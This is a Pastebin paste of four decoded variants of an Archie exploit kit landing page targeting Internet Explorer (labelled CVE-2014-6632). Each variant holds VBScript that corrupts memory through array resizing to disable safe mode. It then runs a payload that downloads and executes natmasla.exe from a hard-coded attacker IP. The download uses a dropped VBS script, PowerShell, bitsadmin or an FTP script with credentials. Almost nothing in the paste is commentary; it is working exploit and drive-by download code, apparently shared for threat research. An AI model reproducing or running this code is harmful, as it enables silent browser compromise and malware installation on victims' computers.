Advertisement
Kafeine

Archie_B64_Decoder_2014-11-24_CVE-2014-6632

Nov 24th, 2014
1,135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 17.43 KB | None | 0 0
  1. <!doctype html>
  2. <html>
  3. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  4.  
  5. <head> </head>
  6.  
  7. <body>
  8.     <SCRIPT LANGUAGE="VBScript">
  9.         function runmumaa() On Error Resume Next set shell = createobject("Shell.Application") shell.ShellExecute "cmd.exe", "/c CD %TEMP%&@echo Set objXMLHTTP=CreateObject("
  10.        "MSXML2.XMLHTTP"
  11.        ")>YftLvpsd.vbs&@echo objXMLHTTP.open "
  12.        "GET"
  13.        ","
  14.        "http://31.184.194.99:40507/spore_cannon"
  15.        ",false>>YftLvpsd.vbs&@echo objXMLHTTP.send()>>YftLvpsd.vbs&@echo If objXMLHTTP.Status=200 Then>>YftLvpsd.vbs&@echo Set objADOStream=CreateObject("
  16.        "ADODB.Stream"
  17.        ")>>YftLvpsd.vbs&@echo objADOStream.Open>>YftLvpsd.vbs&@echo objADOStream.Type=1 >>YftLvpsd.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>YftLvpsd.vbs&@echo objADOStream.Position=0 >>YftLvpsd.vbs&@echo objADOStream.SaveToFile "
  18.        "%TEMP%\natmasla.exe"
  19.        ">>YftLvpsd.vbs&@echo objADOStream.Close>>YftLvpsd.vbs&@echo Set objADOStream=Nothing>>YftLvpsd.vbs&@echo End if>>YftLvpsd.vbs&@echo Set objXMLHTTP=Nothing>>YftLvpsd.vbs&@echo Set objShell=CreateObject("
  20.        "WScript.Shell"
  21.        ")>>YftLvpsd.vbs&@echo objShell.Exec("
  22.        "%TEMP%\natmasla.exe"
  23.        ")>>YftLvpsd.vbs&cscript.exe %TEMP%\YftLvpsd.vbs&del %TEMP%\YftLvpsd.vbs", "", "open", 0 end
  24.        function
  25.    </script> New record created successfully
  26.    <SCRIPT LANGUAGE="VBScript">
  27.        dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin()
  28.        function Begin() On Error Resume Next info = Navigator.UserAgent
  29.        if (instr(info, "Win64") > 0) then exit
  30.        function end
  31.        if if (instr(info, "MSIE") > 0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  32.        else exit
  33.        function end
  34.        if win9x = 0 BeginInit() If Create() = True Then myarray = chrw(01) & chrw(2176) & chrw(01) & chrw(00) & chrw(00) & chrw(00) & chrw(00) & chrw(00) myarray = myarray & chrw(00) & chrw(32767) & chrw(00) & chrw(0) if (intVersion < 4) then document.write("<br> IE") document.write(intVersion) runshellcode()
  35.            else setnotsafemode() end
  36.            if end
  37.        if end
  38.        function
  39.        function BeginInit() Randomize() redim aa(5) redim ab(5) a0 = 13 + 17 * rnd(6) a3 = 7 + 3 * rnd(5) end
  40.        function
  41.        function Create() On Error Resume Next dim i Create = False For i = 0 To 400 If Over() = True Then '   document.write(i)              Create=True         Exit For      End If     Next  end function     sub testaa()  end sub     function mydata()      On Error Resume Next       i=testaa       i=null       redim  Preserve aa(a2)             ab(0)=0       aa(a1)=i       ab(0)=6.36598737437801E-314          aa(a1+2)=myarray       ab(2)=1.74088534731324E-310         mydata=aa(a1)       redim  Preserve aa(a0)    end function         function setnotsafemode()      On Error Resume Next      i=mydata()        i=readmemo(i+8)      i=readmemo(i+16)      j=readmemo(i+&h134)        for k=0 to &h60 step 4          j=readmemo(i+&h120+k)          if(j=14) then                j=0                          redim  Preserve aa(a2)                    aa(a1+2)(i+&h11c+k)=ab(4)                redim  Preserve aa(a0)            j=0                 j=readmemo(i+&h120+k)                               Exit for             end if         next       ab(2)=1.69759663316747E-313      runmumaa()   end function     function Over()      On Error Resume Next      dim type1,type2,type3      Over=False      a0=a0+a3      a1=a0+2      a2=a0+&h8000000          redim  Preserve aa(a0)       redim   ab(a0)               redim  Preserve aa(a2)          type1=1      ab(0)=1.123456789012345678901234567890      aa(a0)=10                  If(IsObject(aa(a1-1)) = False) Then         if(intVersion<4) then             mem=cint(a0+1)*16                          j=vartype(aa(a1-1))             if((j=mem+4) or (j*8=mem+8)) then                if(vartype(aa(a1-1))<>0)  Then                       If(IsObject(aa(a1)) = False ) Then                                  type1=VarType(aa(a1))                   end if                               end if             else               redim  Preserve aa(a0)               exit  function                end if           else             if(vartype(aa(a1-1))<>0)  Then                    If(IsObject(aa(a1)) = False ) Then                    type1=VarType(aa(a1))                end if                             end if          end if      end if                            If(type1=&h2f66) Then                     Over=True            End If        If(type1=&hB9AD) Then            Over=True            win9x=1      End If           redim  Preserve aa(a0)                      end function     function ReadMemo(add)       On Error Resume Next      redim  Preserve aa(a2)            ab(0)=0         aa(a1)=add+4           ab(0)=1.69759663316747E-313             ReadMemo=lenb(aa(a1))             ab(0)=0             redim  Preserve aa(a0)  end function
  42.    </script>
  43. </body>
  44.  
  45. </html>
  46. <!doctype html>
  47. <html>
  48. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  49.  
  50. <head> </head>
  51.  
  52. <body>
  53.    <SCRIPT LANGUAGE="VBScript">
  54.        function runmumaa() On Error Resume Next set shell = createobject("Shell.Application") shell.ShellExecute "cmd.exe", "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://31.184.194.99:40507/spore_cannon','%TEMP%\natmasla.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')", "", "open", 0 end
  55.         function
  56.     </script> New record created successfully
  57.     <SCRIPT LANGUAGE="VBScript">
  58.         dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin()
  59.         function Begin() On Error Resume Next info = Navigator.UserAgent
  60.         if (instr(info, "Win64") > 0) then exit
  61.         function end
  62.         if if (instr(info, "MSIE") > 0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  63.         else exit
  64.         function end
  65.         if win9x = 0 BeginInit() If Create() = True Then myarray = chrw(01) & chrw(2176) & chrw(01) & chrw(00) & chrw(00) & chrw(00) & chrw(00) & chrw(00) myarray = myarray & chrw(00) & chrw(32767) & chrw(00) & chrw(0) if (intVersion < 4) then document.write("<br> IE") document.write(intVersion) runshellcode()
  66.            else setnotsafemode() end
  67.            if end
  68.        if end
  69.        function
  70.        function BeginInit() Randomize() redim aa(5) redim ab(5) a0 = 13 + 17 * rnd(6) a3 = 7 + 3 * rnd(5) end
  71.        function
  72.        function Create() On Error Resume Next dim i Create = False For i = 0 To 400 If Over() = True Then '   document.write(i)              Create=True         Exit For      End If     Next  end function     sub testaa()  end sub     function mydata()      On Error Resume Next       i=testaa       i=null       redim  Preserve aa(a2)             ab(0)=0       aa(a1)=i       ab(0)=6.36598737437801E-314          aa(a1+2)=myarray       ab(2)=1.74088534731324E-310         mydata=aa(a1)       redim  Preserve aa(a0)    end function         function setnotsafemode()      On Error Resume Next      i=mydata()        i=readmemo(i+8)      i=readmemo(i+16)      j=readmemo(i+&h134)        for k=0 to &h60 step 4          j=readmemo(i+&h120+k)          if(j=14) then                j=0                          redim  Preserve aa(a2)                    aa(a1+2)(i+&h11c+k)=ab(4)                redim  Preserve aa(a0)            j=0                 j=readmemo(i+&h120+k)                               Exit for             end if         next       ab(2)=1.69759663316747E-313      runmumaa()   end function     function Over()      On Error Resume Next      dim type1,type2,type3      Over=False      a0=a0+a3      a1=a0+2      a2=a0+&h8000000          redim  Preserve aa(a0)       redim   ab(a0)               redim  Preserve aa(a2)          type1=1      ab(0)=1.123456789012345678901234567890      aa(a0)=10                  If(IsObject(aa(a1-1)) = False) Then         if(intVersion<4) then             mem=cint(a0+1)*16                          j=vartype(aa(a1-1))             if((j=mem+4) or (j*8=mem+8)) then                if(vartype(aa(a1-1))<>0)  Then                       If(IsObject(aa(a1)) = False ) Then                                  type1=VarType(aa(a1))                   end if                               end if             else               redim  Preserve aa(a0)               exit  function                end if           else             if(vartype(aa(a1-1))<>0)  Then                    If(IsObject(aa(a1)) = False ) Then                    type1=VarType(aa(a1))                end if                             end if          end if      end if                            If(type1=&h2f66) Then                     Over=True            End If        If(type1=&hB9AD) Then            Over=True            win9x=1      End If           redim  Preserve aa(a0)                      end function     function ReadMemo(add)       On Error Resume Next      redim  Preserve aa(a2)            ab(0)=0         aa(a1)=add+4           ab(0)=1.69759663316747E-313             ReadMemo=lenb(aa(a1))             ab(0)=0             redim  Preserve aa(a0)  end function
  73.    </script>
  74. </body>
  75.  
  76. </html>
  77. <!doctype html>
  78. <html>
  79. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  80.  
  81. <head> </head>
  82.  
  83. <body>
  84.    <SCRIPT LANGUAGE="VBScript">
  85.        function runmumaa() On Error Resume Next shell.ShellExecute "cmd.exe", "/c CD %TEMP%&cmd.exe /c "
  86.        "bitsadmin /transfer myjob /download /priority high http://31.184.194.99:40507/spore_cannon %TEMP%\natmasla.exe&start %TEMP%\natmasla.exe"
  87.        "", "", "open", 0 gset shell = createobject("Shell.Application") end
  88.        function
  89.    </script> New record created successfully
  90.    <SCRIPT LANGUAGE="VBScript">
  91.        dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin()
  92.        function Begin() On Error Resume Next info = Navigator.UserAgent
  93.        if (instr(info, "Win64") > 0) then exit
  94.        function end
  95.        if if (instr(info, "MSIE") > 0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  96.        else exit
  97.        function end
  98.        if win9x = 0 BeginInit() If Create() = True Then myarray = chrw(01) & chrw(2176) & chrw(01) & chrw(00) & chrw(00) & chrw(00) & chrw(00) & chrw(00) myarray = myarray & chrw(00) & chrw(32767) & chrw(00) & chrw(0) if (intVersion < 4) then document.write("<br> IE") document.write(intVersion) runshellcode()
  99.            else setnotsafemode() end
  100.            if end
  101.        if end
  102.        function
  103.        function BeginInit() Randomize() redim aa(5) redim ab(5) a0 = 13 + 17 * rnd(6) a3 = 7 + 3 * rnd(5) end
  104.        function
  105.        function Create() On Error Resume Next dim i Create = False For i = 0 To 400 If Over() = True Then '   document.write(i)              Create=True         Exit For      End If     Next  end function     sub testaa()  end sub     function mydata()      On Error Resume Next       i=testaa       i=null       redim  Preserve aa(a2)             ab(0)=0       aa(a1)=i       ab(0)=6.36598737437801E-314          aa(a1+2)=myarray       ab(2)=1.74088534731324E-310         mydata=aa(a1)       redim  Preserve aa(a0)    end function         function setnotsafemode()      On Error Resume Next      i=mydata()        i=readmemo(i+8)      i=readmemo(i+16)      j=readmemo(i+&h134)        for k=0 to &h60 step 4          j=readmemo(i+&h120+k)          if(j=14) then                j=0                          redim  Preserve aa(a2)                    aa(a1+2)(i+&h11c+k)=ab(4)                redim  Preserve aa(a0)            j=0                 j=readmemo(i+&h120+k)                               Exit for             end if         next       ab(2)=1.69759663316747E-313      runmumaa()   end function     function Over()      On Error Resume Next      dim type1,type2,type3      Over=False      a0=a0+a3      a1=a0+2      a2=a0+&h8000000          redim  Preserve aa(a0)       redim   ab(a0)               redim  Preserve aa(a2)          type1=1      ab(0)=1.123456789012345678901234567890      aa(a0)=10                  If(IsObject(aa(a1-1)) = False) Then         if(intVersion<4) then             mem=cint(a0+1)*16                          j=vartype(aa(a1-1))             if((j=mem+4) or (j*8=mem+8)) then                if(vartype(aa(a1-1))<>0)  Then                       If(IsObject(aa(a1)) = False ) Then                                  type1=VarType(aa(a1))                   end if                               end if             else               redim  Preserve aa(a0)               exit  function                end if           else             if(vartype(aa(a1-1))<>0)  Then                    If(IsObject(aa(a1)) = False ) Then                    type1=VarType(aa(a1))                end if                             end if          end if      end if                            If(type1=&h2f66) Then                     Over=True            End If        If(type1=&hB9AD) Then            Over=True            win9x=1      End If           redim  Preserve aa(a0)                      end function     function ReadMemo(add)       On Error Resume Next      redim  Preserve aa(a2)            ab(0)=0         aa(a1)=add+4           ab(0)=1.69759663316747E-313             ReadMemo=lenb(aa(a1))             ab(0)=0             redim  Preserve aa(a0)  end function
  106.    </script>
  107. </body>
  108.  
  109. </html>
  110. <!doctype html>
  111. <html>
  112. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  113.  
  114. <head> </head>
  115.  
  116. <body>
  117.    <SCRIPT LANGUAGE="VBScript">
  118.        function runmumaa() On Error Resume Next set shell = createobject("Shell.Application") shell.ShellExecute "cmd.exe", "/c @echo open 31.184.194.99>open.txt&@echo vbs@31.184.194.99>>open.txt&@echo 123456>>open.txt&@echo binary>>open.txt&@echo get spore_cannon>>open.txt&@echo bye>>open.txt&ftp -s:open.txt&start /B natmasla.exe", "", "open", 0 end
  119.        function
  120.    </script>
  121.    <SCRIPT LANGUAGE="VBScript">
  122.        dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin()
  123.        function Begin() On Error Resume Next info = Navigator.UserAgent
  124.        if (instr(info, "Win64") > 0) then exit
  125.        function end
  126.        if if (instr(info, "MSIE") > 0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  127.        else exit
  128.        function end
  129.        if win9x = 0 BeginInit() If Create() = True Then myarray = chrw(01) & chrw(2176) & chrw(01) & chrw(00) & chrw(00) & chrw(00) & chrw(00) & chrw(00) myarray = myarray & chrw(00) & chrw(32767) & chrw(00) & chrw(0) if (intVersion < 4) then document.write("<br> IE") document.write(intVersion) runshellcode()
  130.            else setnotsafemode() end
  131.            if end
  132.        if end
  133.        function
  134.        function BeginInit() Randomize() redim aa(5) redim ab(5) a0 = 13 + 17 * rnd(6) a3 = 7 + 3 * rnd(5) end
  135.        function
  136.        function Create() On Error Resume Next dim i Create = False For i = 0 To 400 If Over() = True Then '   document.write(i)              Create=True         Exit For      End If     Next  end function     sub testaa()  end sub     function mydata()      On Error Resume Next       i=testaa       i=null       redim  Preserve aa(a2)             ab(0)=0       aa(a1)=i       ab(0)=6.36598737437801E-314          aa(a1+2)=myarray       ab(2)=1.74088534731324E-310         mydata=aa(a1)       redim  Preserve aa(a0)    end function         function setnotsafemode()      On Error Resume Next      i=mydata()        i=readmemo(i+8)      i=readmemo(i+16)      j=readmemo(i+&h134)        for k=0 to &h60 step 4          j=readmemo(i+&h120+k)          if(j=14) then                j=0                          redim  Preserve aa(a2)                    aa(a1+2)(i+&h11c+k)=ab(4)                redim  Preserve aa(a0)            j=0                 j=readmemo(i+&h120+k)                               Exit for             end if         next       ab(2)=1.69759663316747E-313      runmumaa()   end function     function Over()      On Error Resume Next      dim type1,type2,type3      Over=False      a0=a0+a3      a1=a0+2      a2=a0+&h8000000          redim  Preserve aa(a0)       redim   ab(a0)               redim  Preserve aa(a2)          type1=1      ab(0)=1.123456789012345678901234567890      aa(a0)=10                  If(IsObject(aa(a1-1)) = False) Then         if(intVersion<4) then             mem=cint(a0+1)*16                          j=vartype(aa(a1-1))             if((j=mem+4) or (j*8=mem+8)) then                if(vartype(aa(a1-1))<>0)  Then                       If(IsObject(aa(a1)) = False ) Then                                  type1=VarType(aa(a1))                   end if                               end if             else               redim  Preserve aa(a0)               exit  function                end if           else             if(vartype(aa(a1-1))<>0)  Then                    If(IsObject(aa(a1)) = False ) Then                    type1=VarType(aa(a1))                end if                             end if          end if      end if                            If(type1=&h2f66) Then                     Over=True            End If        If(type1=&hB9AD) Then            Over=True            win9x=1      End If           redim  Preserve aa(a0)                      end function     function ReadMemo(add)       On Error Resume Next      redim  Preserve aa(a2)            ab(0)=0         aa(a1)=add+4           ab(0)=1.69759663316747E-313             ReadMemo=lenb(aa(a1))             ab(0)=0             redim  Preserve aa(a0)  end function
  137.    </script>
  138. </body>
  139.  
  140. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement